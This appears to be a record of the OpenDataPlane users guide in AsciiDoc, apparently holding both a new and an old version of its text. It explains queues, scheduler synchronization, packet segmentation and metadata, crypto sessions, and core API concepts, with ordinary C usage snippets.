the logical reverse of the initialization procedure, with\n'odp_term_local()' called for each thread before 'odp_term_global()' is\ncalled to terminate ODP.\n\n.ODP Application Structure Flow Diagram\nimage::..\/images\/resource_management.svg[align=\"center\"]\n
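A minimal single-thread skeleton of this life cycle is sketched below. Error handling is abbreviated, NULL parameter pointers are assumed to select implementation defaults, and the exact signature of 'odp_init_local()' (shown here taking a thread type) depends on the ODP API level:\n\n.Minimal initialization\/termination skeleton (sketch)\n[source,c]\n----\n#include <odp.h>\n\nint main(void)\n{\n    \/* Establish the ODP API framework; MUST precede all other ODP calls *\/\n    if (odp_init_global(NULL, NULL))\n        return 1;\n\n    \/* Establish this thread's local ODP context *\/\n    if (odp_init_local(ODP_THREAD_CONTROL))\n        return 1;\n\n    \/* ...create pools, queues, and pktios, then run the application... *\/\n\n    \/* Shutdown is the logical reverse of initialization *\/\n    odp_term_local();\n    odp_term_global();\n\n    return 0;\n}\n----\n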
== Common Conventions\nMany ODP APIs share common conventions regarding their arguments and return\ntypes. This section highlights some of the more common and frequently used\nconventions.\n\n=== Handles and Special Designators\nODP resources are represented via _handles_ that have abstract type\n_odp_resource_t_. So pools are represented by handles of type +odp_pool_t+,\nqueues by handles of type +odp_queue_t+, etc. Each such type\nhas a distinguished value _ODP_RESOURCE_INVALID_ that is used to indicate a\nhandle that does not refer to a valid resource of that type. Resources are\ntypically created via an API named _odp_resource_create()_ that returns a\nhandle of type _odp_resource_t_ that represents the created object. This\nreturned handle is set to _ODP_RESOURCE_INVALID_ if, for example, the\nresource could not be created due to resource exhaustion. Invalid resources\ndo not necessarily represent error conditions. For example, +ODP_EVENT_INVALID+\nin response to an +odp_queue_deq()+ call to get an event from a queue simply\nindicates that the queue is empty.\n\n=== Addressing Scope\nUnless specifically noted in the API, all ODP resources are global to the ODP\napplication, whether it runs as a single process or multiple processes. ODP\nhandles therefore have common meaning within an ODP application but have no\nmeaning outside the scope of the application.\n\n=== Resources and Names\nMany ODP resource objects, such as pools and queues, support an\napplication-specified character string _name_ that is associated with an ODP\nobject at create time. This name serves two purposes: documentation and\nlookup. The lookup function is particularly useful to allow an ODP application\nthat is divided into multiple processes to obtain the handle for the common\nresource.\n\n== Queues\nQueues are the fundamental event sequencing mechanism provided by ODP and all\nODP applications make use of them either explicitly or implicitly. Queues are\ncreated via the 'odp_queue_create()' API that returns a handle of type\n+odp_queue_t+ that is used to refer to this queue in all subsequent APIs that\nreference it. Queues have one of two ODP-defined _types_, POLL and SCHED, that\ndetermine how they are used. POLL queues are directly managed by the ODP\napplication while SCHED queues make use of the *ODP scheduler* to provide\nautomatic scalable dispatching and synchronization services.\n\n.Operations on POLL queues\n[source,c]\n----\nodp_queue_t poll_q1 = odp_queue_create(\"poll queue 1\", ODP_QUEUE_TYPE_POLL, NULL);\nodp_queue_t poll_q2 = odp_queue_create(\"poll queue 2\", ODP_QUEUE_TYPE_POLL, NULL);\n...\nodp_event_t ev = odp_queue_deq(poll_q1);\n...do something\nint rc = odp_queue_enq(poll_q2, ev);\n----\n\nThe key distinction is that dequeueing events from POLL queues is an\napplication responsibility while dequeueing events from SCHED queues is the\nresponsibility of the ODP scheduler.\n\n.Operations on SCHED queues\n[source,c]\n----\nodp_queue_param_t qp;\nodp_queue_param_init(&qp);\nodp_schedule_prio_t prio = ...;\nodp_schedule_group_t sched_group = ...;\nqp.sched.prio = prio;\nqp.sched.sync = ODP_SCHED_SYNC_[NONE|ATOMIC|ORDERED];\nqp.sched.group = sched_group;\nqp.sched.lock_count = n; \/* Only relevant for ordered queues *\/\nodp_queue_t sched_q1 = odp_queue_create(\"sched queue 1\", ODP_QUEUE_TYPE_SCHED, &qp);\n\n...thread init processing\n\nwhile (1) {\n    odp_event_t ev;\n    odp_queue_t which_q;\n    ev = odp_schedule(&which_q, <wait option>);\n    ...process the event\n}\n----\n\nWith scheduled queues, events are sent to a queue, and the sender chooses\na queue based on the service it needs. The sender does not need to know\nwhich ODP thread (on which core) or hardware accelerator will process\nthe event, but all the events on a queue are eventually scheduled and processed.\n\nAs can be seen, SCHED queues have additional attributes that are specified at\nqueue create time that control how the scheduler is to process events contained\non them. These include group, priority, and synchronization class.\n\n=== Scheduler Groups\nThe scheduler's dispatching job is to return the next event from the highest\npriority SCHED queue that the caller is eligible to receive events from.\nThis latter consideration is determined by the queue's _scheduler group_, which\nis set at queue create time, and by the caller's _scheduler group mask_ that\nindicates which scheduler group(s) it belongs to. Scheduler groups are\nrepresented by handles of type +odp_schedule_group_t+ and are created by\nthe *odp_schedule_group_create()* API. A number of scheduler groups are\n_predefined_ by ODP. These include +ODP_SCHED_GROUP_ALL+ (all threads),\n+ODP_SCHED_GROUP_WORKER+ (all worker threads), and +ODP_SCHED_GROUP_CONTROL+\n(all control threads). The application is free to create additional scheduler\ngroups for its own purposes, and threads can join or leave scheduler groups\nusing the *odp_schedule_group_join()* and *odp_schedule_group_leave()* APIs.\n
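A sketch of the create-and-join pattern, assuming the thread mask helpers +odp_thrmask_zero()+\/+odp_thrmask_set()+ and the calling thread's ID from +odp_thread_id()+:\n\n.Creating and joining a scheduler group (sketch)\n[source,c]\n----\n#include <odp.h>\n\nstatic odp_schedule_group_t join_rx_group(void)\n{\n    odp_thrmask_t zero, self;\n    odp_schedule_group_t group;\n\n    \/* Create the group with no initial members *\/\n    odp_thrmask_zero(&zero);\n    group = odp_schedule_group_create(\"rx-workers\", &zero);\n\n    \/* Add the calling thread to the group *\/\n    odp_thrmask_zero(&self);\n    odp_thrmask_set(&self, odp_thread_id());\n    odp_schedule_group_join(group, &self);\n\n    return group;\n}\n----\n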
=== Scheduler Priority\nThe +prio+ field of the +odp_queue_param_t+ specifies the queue's scheduling\npriority, which is how queues within eligible scheduler groups are selected\nfor dispatch. Queues have a default scheduling priority of NORMAL but can be\nset to HIGHEST or LOWEST according to application needs.\n\n=== Scheduler Synchronization\nIn addition to its dispatching function, which provides automatic scalability to\nODP applications in many-core environments, the other main function of the\nscheduler is to provide event synchronization services that greatly simplify\napplication programming in a parallel processing environment. A queue's\nSYNC mode determines how the scheduler handles the synchronization processing\nof multiple events originating from the same queue.\n\nThree types of queue scheduler synchronization are supported: Parallel,\nAtomic, and Ordered.\n\n==== Parallel Queues\nSCHED queues that specify a sync mode of ODP_SCHED_SYNC_NONE are unrestricted\nin how events are processed.\n\n.Parallel Queue Scheduling\nimage::..\/images\/parallel_queue.svg[align=\"center\"]\n\nAll events held on parallel queues are eligible to be scheduled simultaneously\nand any required synchronization between them is the responsibility of the\napplication. Events originating from parallel queues thus have the highest\nthroughput rate; however, they also potentially involve the most work on the\npart of the application. In the figure above, four threads are calling\n*odp_schedule()* to obtain events to process. The scheduler has assigned\nthree events from the first queue to three threads in parallel. The fourth\nthread is processing a single event from the third queue. The second queue\nmight either be empty, of lower priority, or not in a scheduler group matching\nany of the threads being serviced by the scheduler.\n\n==== Atomic Queues\nAtomic queues simplify event synchronization because only a single thread may\nprocess event(s) from a given atomic queue at a time. Events scheduled from\natomic queues thus can be processed lock-free because the locking is being\ndone implicitly by the scheduler. Note that the caller may receive one or\nmore events from the same atomic queue if *odp_schedule_multi()* is used. In\nthis case these multiple events all share the same atomic scheduling context.\n\n.Atomic Queue Scheduling\nimage::..\/images\/atomic_queue.svg[align=\"center\"]\n\nIn this example, no matter how many events may be held in an atomic queue,\nonly one calling thread can receive scheduled events from it at a time. Here\ntwo threads process events from two different atomic queues. Note that there\nis no synchronization between different atomic queues, only between events\noriginating from the same atomic queue. 
The queue context associated with the\natomic queue is held until the next call to the scheduler or until the\napplication explicitly releases it via a call to\n*odp_schedule_release_atomic()*.\n\nNote that while atomic queues simplify programming, the serial nature of\natomic queues may impair scaling.\n\n==== Ordered Queues\nOrdered queues provide the best of both worlds: the inherent\nscalability of parallel queues with the easy synchronization of atomic\nqueues.\n\n.Ordered Queue Scheduling\nimage::..\/images\/ordered_queue.svg[align=\"center\"]\n\nWhen scheduling events from an ordered queue, the scheduler dispatches multiple\nevents from the queue in parallel to different threads; however, the scheduler\nalso ensures that the relative sequence of these events on output queues\nis identical to their sequence from their originating ordered queue.\n\nAs with atomic queues, the ordering guarantees associated with ordered queues\nrefer to events originating from the same queue, not to those originating on\ndifferent queues. Thus in this figure three threads are processing events 5, 3,\nand 4, respectively, from the first ordered queue. Regardless of how these\nthreads complete processing, these events will appear in their original\nrelative order on their output queue.\n\n===== Order Preservation\nRelative order is preserved independent of whether events are being sent to\ndifferent output queues. For example, if some events are sent to output queue\nA while others are sent to output queue B then the events on these output\nqueues will still be in the same relative order as they were on their\noriginating queue. Similarly, if the processing consumes events so that no\noutput is issued for some of them (_e.g.,_ as part of IP fragment reassembly\nprocessing) then other events will still be correctly ordered with respect to\nthese sequence gaps. Finally, if multiple events are enqueued for a given\norder (_e.g.,_ as part of packet segmentation processing for MTU\nconsiderations), then each of these events will occupy the originator's\nsequence in the target output queue(s). In this case the relative order of these\nevents will be in the order that the thread issued *odp_queue_enq()* calls for\nthem.\n\nThe ordered context associated with the dispatch of an event from an ordered\nqueue lasts until the next scheduler call or until explicitly released by\nthe thread calling *odp_schedule_release_ordered()*. This call may be used\nas a performance advisory that the thread no longer requires ordering\nguarantees for the current context. As a result, any subsequent enqueues\nwithin the current scheduler context will be treated as if the thread was\noperating in a parallel queue context.\n\n===== Ordered Locking\nAnother powerful feature of the scheduler's handling of ordered queues is\n*ordered locks*. Each ordered queue has associated with it a number of ordered\nlocks as specified by the _lock_count_ parameter at queue create time.\n\nOrdered locks provide an efficient means to perform in-order sequential\nprocessing within an ordered context. For example, suppose events with relative\norder 5, 6, and 7 are being executed in parallel by three different threads. An\nordered lock will enable these threads to synchronize such that they can\nperform some critical section in their originating queue order. The number of\nordered locks supported for each ordered queue is implementation dependent (and\nqueryable via the *odp_config_max_ordered_locks_per_queue()* API). 
If the\nimplementation supports multiple ordered locks then these may be used to\nprotect different ordered critical sections within a given ordered context.\n\n===== Summary: Ordered Queues\nTo see how these considerations fit together, consider the following code:\n\n.Processing with Ordered Queues\n[source,c]\n----\nvoid worker_thread()\n{\n    odp_event_t ev;\n    odp_queue_t which_q;\n    odp_queue_t dest_q = ...; \/* output queue for processed events *\/\n\n    odp_init_local();\n    ...other initialization processing\n\n    while (1) {\n        ev = odp_schedule(&which_q, ODP_SCHED_WAIT);\n        ...process events in parallel\n        odp_schedule_order_lock(0);\n        ...critical section processed in order\n        odp_schedule_order_unlock(0);\n        ...continue processing in parallel\n        odp_queue_enq(dest_q, ev);\n    }\n}\n----\n\nThis represents a simplified structure for a typical worker thread operating\non ordered queues. Multiple events are processed in parallel and the use of\nordered queues ensures that they will be placed on +dest_q+ in the same order\nas they originated. While processing in parallel, the use of ordered locks\nenables critical sections to be processed in order within the overall parallel\nflow. When a thread arrives at the *odp_schedule_order_lock()* call, it waits\nuntil the locking order for this lock for all prior events has been resolved\nand then enters the critical section. The *odp_schedule_order_unlock()* call\nreleases the critical section and allows the next order to enter it.\n\n=== Queue Scheduling Summary\n\nNOTE: Both ordered and parallel queues improve throughput over atomic queues\ndue to parallel event processing, but require that the application take\nsteps to ensure context data synchronization if needed.\n\n== Packet Processing\nODP applications are designed to process packets, which are the basic unit of\ndata of interest in the data plane. To assist in processing packets, ODP\nprovides a set of APIs that enable applications to examine and manipulate\npacket data and metadata. Packets are referenced by an abstract *odp_packet_t*\nhandle defined by each implementation.\n\nPacket objects are normally created at ingress when they arrive at a source\n*odp_pktio_t* and are received by an application either directly or (more\ntypically) from a scheduled receive queue. They MAY be implicitly freed when\nthey are transmitted to an output *odp_pktio_t* via an associated transmit\nqueue, or freed directly via the +odp_packet_free()+ API.\n
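The allocate\/free path for application-originated packets can be sketched as follows (assuming a packet pool +pkt_pool+ created earlier by the application):\n\n.Allocating and freeing a packet (sketch)\n[source,c]\n----\n#include <odp.h>\n\nstatic void packet_lifecycle(odp_pool_t pkt_pool)\n{\n    \/* Allocate a 256-byte packet from a pool of type ODP_POOL_PACKET *\/\n    odp_packet_t pkt = odp_packet_alloc(pkt_pool, 256);\n\n    if (pkt == ODP_PACKET_INVALID)\n        return;\n\n    \/* ...fill in headers and payload, then transmit, or simply... *\/\n    odp_packet_free(pkt);\n}\n----\n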
Occasionally an application may originate a packet itself, either _de novo_ or\nby deriving it from an existing packet, and APIs are provided to assist in\nthese cases as well. Application-created packets can be recycled back through\na _loopback interface_ to reparse and reclassify them, or the application can\ndo its own parsing as desired.\n\nVarious attributes associated with a packet, such as parse results, are\nstored as metadata and APIs are provided to permit applications to examine\nand\/or modify this information.\n\n=== Packet Structure and Concepts\nA _packet_ consists of a sequence of octets conforming to an architected\nformat, such as Ethernet, that can be received and transmitted via the ODP\n*pktio* abstraction. Packets have a _length_, which is the number of bytes in\nthe packet. Packet data in ODP is referenced via _offsets_ since these reflect\nthe logical contents and structure of a packet independent of how particular\nODP implementations store that data.\n\nThese concepts are shown in the following diagram:\n\n.ODP Packet Structure\nimage::..\/images\/packet.svg[align=\"center\"]\n\nPacket data consists of zero or more _headers_ followed by zero or more bytes of\n_payload_, followed by zero or more _trailers_. Shown here are various APIs\nthat permit applications to examine and navigate various parts of a packet and\nto manipulate its structure.\n\nTo support packet manipulation, predefined _headroom_ and _tailroom_\nareas are logically associated with a packet. Packets can be adjusted by\n_pulling_ and _pushing_ these areas. Typical packet processing might consist\nof stripping headers from a packet via +odp_packet_pull_head()+ calls as part\nof receive processing and then replacing them with new headers via\n+odp_packet_push_head()+ calls as the packet is being prepared for transmit.\n
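A sketch of that strip-and-replace pattern (assuming a fixed, known header length +HDR_LEN+; both calls return NULL if the adjustment exceeds the available packet data or headroom):\n\n.Adjusting packet headroom (sketch)\n[source,c]\n----\n#include <odp.h>\n#include <string.h>\n\n#define HDR_LEN 14 \/* assumed: strip and re-add an Ethernet-sized header *\/\n\nstatic void reframe(odp_packet_t pkt)\n{\n    \/* Strip the current header: the data pointer moves forward, headroom grows *\/\n    if (odp_packet_pull_head(pkt, HDR_LEN) == NULL)\n        return;\n\n    \/* ...application processing of the inner packet... *\/\n\n    \/* Prepend a new header: the data pointer moves back into the headroom *\/\n    void *new_hdr = odp_packet_push_head(pkt, HDR_LEN);\n\n    if (new_hdr != NULL)\n        memset(new_hdr, 0, HDR_LEN); \/* fill in the real header here *\/\n}\n----\n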
=== Packet Segments and Addressing\nODP platforms use various methods and techniques to store and process packets\nefficiently. These vary considerably from platform to platform, so to ensure\nportability across them ODP adopts certain conventions for referencing\npackets.\n\nODP APIs use a handle of type *odp_packet_t* to refer to packet objects.\nAssociated with packets are various bits of system metadata that describe the\npacket. By referring to the metadata, ODP applications accelerate packet\nprocessing by minimizing the need to examine packet data. This is because the\nmetadata is populated by parsing and classification functions that are coupled\nto ingress processing that occurs prior to a packet being presented to the\napplication via the ODP scheduler.\n\nWhen an ODP application needs to examine the contents of a packet, it requests\naddressability to it via an API call that makes the packet (or a contiguously\naddressable _segment_ of it) available for coherent access by the application.\nTo ensure portability, ODP applications assume that the underlying\nimplementation stores packets in _segments_ of implementation-defined\nand managed size. These represent the contiguously addressable portions of a\npacket that the application may refer to via normal memory accesses. ODP\nprovides APIs that allow applications to operate on packet segments in an\nefficient and portable manner as needed. By combining these with the metadata\nprovided by packets, ODP applications can operate in a fully\nplatform-independent manner while still achieving optimal performance across\nthe range of platforms that support ODP.\n\nThe use of segments for packet addressing and their relationship to metadata\nis shown in this diagram:\n\n.ODP Packet Segmentation\nimage::..\/images\/segment.svg[align=\"center\"]\n\nThe packet metadata is set during parsing and identifies the starting offsets\nof the various headers in the packet. The packet itself is physically stored\nas a sequence of segments that are managed by the ODP implementation.\nSegment 0 is the first segment of the packet and is where the packet's headroom\nand headers typically reside. Depending on the length of the packet,\nadditional segments may be part of the packet and contain the remaining packet\npayload and tailroom. The application need not concern itself with segments\nexcept that when the application requires addressability to a packet it\nunderstands that addressability is provided on a per-segment basis. So, for\nexample, if the application makes a call like +odp_packet_l4_ptr()+ to obtain\naddressability to the packet's Layer 4 header, the returned length from that\ncall is the number of bytes from the start of the Layer 4 header that are\ncontiguously addressable to the application from the returned pointer address.\nThis is because the following byte occupies a different segment and may be\nstored elsewhere. To obtain access to those bytes, the application simply\nrequests addressability to that offset and it will be able to address the\npacket bytes that occupy the next segment, etc. Note that the returned\nlength for any packet addressability call is always the lesser of the remaining\npacket length or the size of its containing segment. So a mapping for segment 2\nin the above figure, for example, would return a length that extends only to\nthe end of the packet since the remaining bytes are part of the tailroom\nreserved for the packet and are not usable by the application until made\navailable to it by an appropriate API call.\n
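This per-segment model leads to a simple walk pattern. A sketch using +odp_packet_offset()+, which returns the address at a given offset along with the number of contiguously addressable bytes at that point (+consume_bytes()+ is a hypothetical application function):\n\n.Walking a packet segment by segment (sketch)\n[source,c]\n----\n#include <odp.h>\n\nstatic void consume_bytes(void *addr, uint32_t len); \/* hypothetical application code *\/\n\nstatic void walk_packet(odp_packet_t pkt)\n{\n    uint32_t offset = 0;\n    uint32_t total  = odp_packet_len(pkt);\n\n    while (offset < total) {\n        uint32_t seg_len;\n        void *addr = odp_packet_offset(pkt, offset, &seg_len, NULL);\n\n        \/* addr points to seg_len contiguously addressable bytes *\/\n        consume_bytes(addr, seg_len);\n        offset += seg_len;\n    }\n}\n----\n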
=== Metadata Processing\nAs noted, packet metadata is normally set by the parser as part of\nclassification that occurs during packet receive processing. It is important\nto note that this metadata may be changed by the application to reflect\nchanges in the packet contents and\/or structure as part of its processing of\nthe packet. While changing this metadata may affect some ODP APIs, changing\nmetadata is designed to _document_ application changes to the packet but\ndoes not in itself _cause_ those changes to be made. For example, if an\napplication changes the Layer 3 offset by using the +odp_packet_l3_offset_set()+\nAPI, then subsequent calls to +odp_packet_l3_ptr()+ will return an address\nstarting from that changed offset. However, changing an attribute like\n+odp_packet_has_udp_set()+ will not, by itself, turn a non-UDP packet into\na valid UDP packet. Applications are expected to exercise appropriate care\nwhen changing packet metadata to ensure that the resulting metadata changes\nreflect the actual changed packet structure that the application has made.\n\n== Cryptographic services\n\nODP provides support for cryptographic operations required by various security\nprotocols (_e.g.,_ IPsec). To apply a cryptographic operation to a packet, a\nsession must first be created. Packets processed by a session share the same\ncryptographic parameters, such as algorithms, keys, and initialization vectors.\nA session is created with the *odp_crypto_session_create()* call. After session\ncreation, a cryptographic operation can be applied to a packet using the\n*odp_crypto_operation()* call.\nDepending on the session type (synchronous or asynchronous), the call returns\nwhen the operation has completed or after the request has been submitted. In the\nasynchronous case an operation completion event will be enqueued on the session\ncompletion queue. The completion event conveys the status of the operation and\nthe result. The application has the responsibility to free the completion event.\nThe operation arguments specify for each packet the areas which are to be encrypted\nor decrypted and authenticated. Also, in the asynchronous case a context can be\nassociated with a given operation, and when the operation completion event is\nretrieved the associated context can be retrieved with it. An operation can be\nexecuted in place, where the output packet is the same as the input packet, or\nthe output can be a new packet provided by the application or allocated by the\nimplementation from the session output pool.\n\ninclude::users-guide-tm.adoc[]\n\ninclude::..\/glossary.adoc[]\n","old_contents":"
By allowing each platform the freedom to determine how best to realize each\nAPI's specified functional behavior in an optimal manner, ODP permits\napplications written to its APIs to take full advantage of the unique\ncapabilities of each platform without the application programmer needing to\nhave specialist knowledge of that platform or to be concerned with how best\nto tune the application to a particular platform. This latter consideration is\nparticularly important in Network Function Virtualization (NFV) environments\nwhere the application will run on a target platform chosen by someone else.\n\n.Summary: ODP Implementation Characteristics\n* One size does not fit all--supporting multiple implementations allows ODP\nto adapt to widely differing internals among platforms.\n* Anyone can create an ODP implementation tailored to their platform\n* Distribution and maintenance of each implementation is as owner wishes\n - Open source or closed source as business needs determine\n - Have independent release cycles and service streams\n* Allows HW and SW innovation in how ODP APIs are implemented on each platform.\n\n.Reference Implementations\nTo make it easy to get started with implementing ODP on a new platform, ODP\nsupplies a number of _reference implementations_ that can serve as a\nstarting point. The two primary references implementations supplied by ODP are\n*odp-linux* and *odp-dpdk*\n\n.odp-linux\nThe *odp-linux* reference implementation is a pure SW implementation of the\nODP API that relies only on the Linux programming API. As a functional model\nfor ODP, it enables ODP to be bootstrapped easily to any platform that\nsupports a Linux kernel.\n\n.odp-dpdk\nThe *odp-dpdk* reference implementation is a pure SW implementation of the\nODP API that uses http:\/\/dpdk.org[DPDK] as a SW accelerator. 
In particular,\n*odp-dpdk* offers superior I\/O performance for systems that use NICs, allowing\nODP applications to take immediate full advantage of the various NIC device\ndrivers supported by DPDK.\n\n.Summary: ODP Reference Implementations\n* Open source, open contribution, BSD-3 licensed.\n* Provide easy bootstrapping of ODP onto new platforms\n* Implementers free to borrow or tailor code as needed for their platform\n* Implementers retain full control over their implementations whether or not\nthey are derived from a reference implementation.\n\n.ODP Validation Test Suite\nThird, to ensure consistency between different ODP implementations, ODP\nconsists of a validation suite that verifies that any given implementation of\nODP faithfully provides the specified functional behavior of each ODP API.\nAs a separate open source component, the validation suite may be used by\napplication writers, system integrators, and platform providers alike to\nconfirm that any purported implementation of ODP does indeed conform to the\nODP API specification.\n\n.Summary: ODP Validation Test Suite\n* Synchronized with ODP API specification\n* Maintained and distributed by LNG\n* Open source, open contribution, BSD-3 licensed.\n* Key to ensuring application portability across all ODP implementations\n* Tests that ODP implementations conform to the specified functional behavior\nof ODP APIs.\n* Can be run at any time by users and vendors to validate implementations\nof ODP.\n\n=== ODP API Specification Versioning\nAs an evolving standard, the ODP API specification is released under an\nincrementing version number, and corresponding implementations of ODP, as well\nas the validation suite that verifies API conformance, are linked to this\nversion number. ODP versions are specified using a standard three-level\nnumber (major.minor.fixlevel) that are incremented according to the degree of\nchange the level represents. Increments to the fix level represent clarification\nof the specification or other minor changes that do not affect either the\nsyntax or semantics of the specification. Such changes in the API specification\nare expected to be rare. Increments to the minor level\nrepresent the introduction of new APIs or functional capabilities, or changes\nto he specified syntax or functional behavior of APIs and thus may require\napplication source code changes. Such changes are well documented in the\nrelease notes for each revision of the specification. Finally, increments to\nthe major level represent significant structural changes that most likely\nrequire some level of application source code change, again as documented in\nthe release notes for that version.\n\n=== ODP Implementation Versioning\nODP implementations are free to use whatever release naming\/numbering\nconventions they wish, as long as it is clear what level of the ODP API a given\nrelease implements. A recommended convention is to use the same three level\nnumbering scheme where the major and minor numbers correspond to the ODP API\nlevel and the fix level represents an implementation-defined service level\nassociated with that API level implementation. The LNG-supplied ODP reference\nimplementations follow this convention.\n\n=== ODP Validation Test Suite Versioning\nThe ODP validation test suite follows these same naming conventions. 
The major\nand minor release numbers correspond to the ODP API level that the suite\nvalidates and the fix level represents the service level of the validation\nsuite itself for that API level.\n\n=== ODP Design Goals\nODP has three primary goals that follow from its component structure. The first\nis application portability across a wide range of platforms. These platforms\ndiffer in terms of processor instruction set architecture, number and types of\napplication processing cores, memory organization, as well as the number and\ntype of platform specific hardware acceleration and offload features that\nare available. ODP applications can move from one conforming implementation\nto another with at most a recompile.\n\nSecond, ODP is designed to permit data plane applications to avail themselves\nof platform-specific features, including specialized hardware accelerators,\nwithout specialized programming. This is achieved by separating the API\nspecification from their implementation on individual platforms. Since each\nplatform implements each ODP API in a manner optimal to that platform,\napplications automatically gain the benefit of such optimizations without the\nneed for explicit programming.\n\nThird, ODP is designed to allow applications to scale out automatically to\nsupport many core architectures. This is done using an event based programming\nmodel that permits applications to be written to be independent of the number\nof processing cores that are available to realize application function. The\nresult is that an application written to this model does not require redesign\nas it scales from 4, to 40, to 400 cores.\n\n== Organization of this Document\nThis document is organized into several sections. The first presents a high\nlevel overview of the ODP API component areas and their associated abstract\ndata types. This section introduces ODP APIs at a conceptual level.\nThe second provides a tutorial on the programming model(s)\nsupported by ODP, paying particular attention to the event model as this\nrepresents the preferred structure for most ODP applications. This section\nbuilds on the concepts introduced in the first section and shows how ODP\napplications are structured to best realize the three ODP design goals\nmentioned earlier. The third section provides a more detailed overview of\nthe major ODP API components and is designed to serve as a companion to the\nfull reference specification for each API. The latter is intended to be used\nby ODP application programmers, as well as implementers, to understand the\nprecise syntax and semantics of each API.\n\n== ODP API Concepts\nODP programs are built around several conceptual structures that every\napplication programmer needs to be familiar with to use ODP effectively. The\nmain ODP concepts are:\nThread, Event, Queue, Pool, Shared Memory, Buffer, Packet, PktIO, Time, Timer,\nand Synchronizer.\n\n=== Thread\nThe thread is the fundamental programming unit in ODP. ODP applications are\norganized into a collection of threads that perform the work that the\napplication is designed to do. ODP threads may or may not share memory with\nother threads--that is up to the implementation. Threads come in two \"flavors\":\ncontrol and worker, that are represented by the abstract type\n+odp_thread_type_t+.\n\nA control thread is a supervisory thread that organizes\nthe operation of worker threads. Worker threads, by contrast, exist to\nperform the main processing logic of the application and employ a run to\ncompletion model. 
Worker threads, in particular, are intended to operate on
dedicated processing cores, especially in many core processing environments;
however, a given implementation may multitask multiple threads on a single
core if desired (typically on smaller and lower performance target
environments).

In addition to thread types, threads have associated _attributes_ such as
_thread mask_ and _scheduler group_ that determine where they can run and
the type of work that they can handle. These will be discussed in greater
detail later.

=== Event
Events are what threads process to perform their work. Events can represent
new work, such as the arrival of a packet that needs to be processed, or they
can represent the completion of requests that have executed asynchronously.
Events can also represent notifications of the passage of time, or of status
changes in various components of interest to the application. Each event has
an event type that describes what it represents. Threads can create new
events, consume events they have processed, or perform some processing on
an event and then pass it along to another component for further processing.
References to events are via handles of abstract type +odp_event_t+. Cast
functions are provided to convert these into specific handles of the
appropriate type represented by the event.
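For example, a thread that dequeues an event typically inspects the event
type before casting the generic handle to a concrete one. The following is a
minimal sketch of this pattern; +in_q+ is an assumed queue handle:

.Identifying an event and converting it to a packet handle
[source,c]
----
/* Dequeue an event and, if it carries a packet, convert the generic
 * event handle into a packet handle for further processing */
odp_event_t ev = odp_queue_deq(in_q);

if (ev != ODP_EVENT_INVALID && odp_event_type(ev) == ODP_EVENT_PACKET) {
	odp_packet_t pkt = odp_packet_from_event(ev);

	/* ...process the packet... */
	odp_packet_free(pkt);
}
----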
=== Queue
A queue is a message passing channel that holds events. Events can be
added to a queue via enqueue operations or removed from a queue via dequeue
operations. The endpoints of a queue will vary depending on how it is used.
Queues come in two major types: polled and scheduled, which will be
discussed in more detail when the event model is introduced. Queues may also
have an associated context, which represents a persistent state for all
events that make use of it. These states are what permit threads to perform
stateful processing on events as well as stateless processing.

Queues are represented by handles of abstract type +odp_queue_t+.

=== Pool
A pool is a shared memory area from which elements may be drawn. Pools
represent the backing store for events, among other things. Pools are
typically created and destroyed by the application during initialization and
termination, respectively, and then used during processing. Pools may be
used by ODP components exclusively, by applications exclusively, or their
use may be shared between the two. Pools have an associated type that
characterizes the elements that they contain. The two most important pool types
are Buffer and Packet.

Pools are represented by handles of abstract type +odp_pool_t+.
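As an illustration, a packet pool might be created during application
initialization along the following lines. This is a minimal sketch; the pool
name and sizing values are arbitrary assumptions:

.Creating a packet pool (sketch)
[source,c]
----
odp_pool_param_t params;
odp_pool_t pool;

/* Initialize the parameter structure to implementation defaults */
odp_pool_param_init(&params);

params.type    = ODP_POOL_PACKET;
params.pkt.len = 1518; /* assumed packet length in bytes */
params.pkt.num = 1024; /* assumed number of packets in the pool */

pool = odp_pool_create("example_pkt_pool", &params);
if (pool == ODP_POOL_INVALID) {
	/* ...handle pool creation failure... */
}
----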
=== Shared Memory
Shared memory represents raw blocks of storage that are sharable between
threads. They are the building blocks of pools but can be used directly by
ODP applications if desired.

Shared memory is represented by handles of abstract type +odp_shm_t+.

=== Buffer
A buffer is a fixed-sized block of shared storage that is used by ODP
components and/or applications to realize their function. Buffers contain
zero or more bytes of application data as well as system-maintained
metadata that provides information about the buffer, such as its size or the
pool it was allocated from. Metadata is an important ODP concept because it
allows for arbitrary amounts of side information to be associated with an
ODP object. Most ODP objects have associated metadata and this metadata is
manipulated via accessor functions that act as getters and setters for
this information. Getter access functions permit an application to read
a metadata item, while setter access functions permit an application to write
a metadata item. Note that some metadata is inherently read only and thus
no setter is provided to manipulate it. When objects have multiple metadata
items, each has its own associated getter and/or setter access function to
inspect or manipulate it.

Buffers are represented by handles of abstract type +odp_buffer_t+.

=== Packet
Packets are received and transmitted via I/O interfaces and represent
the basic data that data plane applications manipulate.
Packets are drawn from pools of type +ODP_POOL_PACKET+.
Unlike buffers, which are simple objects,
ODP packets have a rich set of semantics that permit their inspection
and manipulation in complex ways to be described later. Packets also support
a rich set of metadata as well as user metadata. User metadata permits
applications to associate an application-determined amount of side information
with each packet for its own use.

Packets are represented by handles of abstract type +odp_packet_t+.

=== PktIO
PktIO is how ODP represents I/O interfaces. A pktio object is a logical
port capable of receiving and/or transmitting packets. This may be directly
supported by the underlying platform as an integrated feature,
or may represent a device attached via a PCIe or other bus.

PktIOs are represented by handles of abstract type +odp_pktio_t+.
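As a sketch of how such a port is brought up, an application might open and
start an interface as follows. The interface name "eth0" and the +pool+
handle are assumptions, and the parameter usage follows the 1.x era of the
API:

.Opening and starting a pktio (sketch)
[source,c]
----
odp_pktio_param_t pktio_param;
odp_pktio_t pktio;

odp_pktio_param_init(&pktio_param);
pktio_param.in_mode = ODP_PKTIN_MODE_SCHED; /* deliver RX packets via the scheduler */

pktio = odp_pktio_open("eth0", pool, &pktio_param);
if (pktio == ODP_PKTIO_INVALID) {
	/* ...handle error... */
}

odp_pktio_start(pktio); /* begin packet RX/TX on the interface */
----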
=== Time
The time API is used to measure time intervals and track the time flow of an
application, and presents a convenient way to get access to a time source.
The time API consists of two main parts: a local time API and a global time
API.

==== Local time
The local time API is designed to be used within one thread and can be faster
than the global time API. The local time API cannot be used between threads,
as time consistency is not guaranteed across them; for measurements confined
to a single thread this is sufficient. Local time stamps are therefore local
to the calling thread and must not be shared with other threads. Current
local time can be read with +odp_time_local()+.

==== Global time
The global time API is designed to be used for tracking time between threads,
so global time stamps can be shared between threads. Current global time can
be read with +odp_time_global()+.

Neither local nor global time wraps around during the application's life
cycle. The time API includes functions to operate with time, such as
